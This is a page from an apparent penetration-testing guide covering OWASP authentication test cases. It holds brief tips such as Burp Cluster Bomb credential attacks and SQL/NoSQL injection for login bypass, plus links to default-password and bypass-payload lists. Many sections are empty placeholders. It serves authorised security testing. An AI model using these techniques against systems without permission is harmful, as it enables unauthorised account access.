The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • πŸ”1 - Information Gathering
  • Passive (OSINT)
  • Active
    • πŸ•΅οΈHUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • πŸ’£2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • πŸ‘Ώ3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • πŸ““4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Authentication Testing
  • 4.4.1 Testing for Credentials Transported over an Encrypted Channel
  • 4.4.2 Testing for Default Credentials
  • 4.4.3 Testing for Weak Lock Out Mechanism
  • 4.4.4 Testing for Bypassing Authentication Schema
  • 4.4.5 Testing for Vulnerable Remember Password
  • 4.4.6 Testing for Browser Cache Weaknesses
  • 4.4.7 Testing for Weak Password Policy
  • 4.4.8 Testing for Weak Security Question Answer
  • 4.4.9 Testing for Weak Password Change or Reset Functionalities
  • 4.4.10 Testing for Weaker Authentication in Alternative Channel
  1. Web (OWASP Test cases)

4.4 Authentication Testing

Last updated 5 months ago

4.4.1

Evidence:

​

4.4.2

You can use Burp's Cluster Bomb attack

Evidence:

​

Evidence:

​

Try to break the authentication process in order to obtain a valid session ID.

Try to bypass the authentication mechanisms in any section of the web pages which requires some sort of authentication with the following techinques:

Evidence:

​

Evidence:

​
Cache-Control: no-cache, no-store
Expires: 0
Pragma: no-cache

Evidence:

​

Evidence

​

Evidence:

​

Evidence:

​

Evidence:

​

4.4.3

4.4.4

Access the URL directly without any setted Cookie. You can use the Burp plugin with empty cookies.

Perform SQL or NoSQL injection attacks. β†’ &

4.4.5

4.4.6

4.4.7

4.4.8

4.4.9

4.4.10

Authentication Testing
Testing for Credentials Transported over an Encrypted Channel
Testing for Default Credentials
Cirt - Default passwords
SectLists - Default Credentials
Passwords Database
Data Recovery - Default Passwords
DefaultCreds Cheat Sheet
Small Test
Testing for Weak Lock Out Mechanism
Testing for Bypassing Authentication Schema
Autorize
SQLi_Auth_Bypass-Master_List.txt
No SQLI Payloads
Testing for Vulnerable Remember Password
Testing for Browser Cache Weaknesses
Testing for Weak Password Policy
Testing for Weak Security Question Answer
Testing for Weak Password Change or Reset Functionalities
Testing for Weaker Authentication in Alternative Channel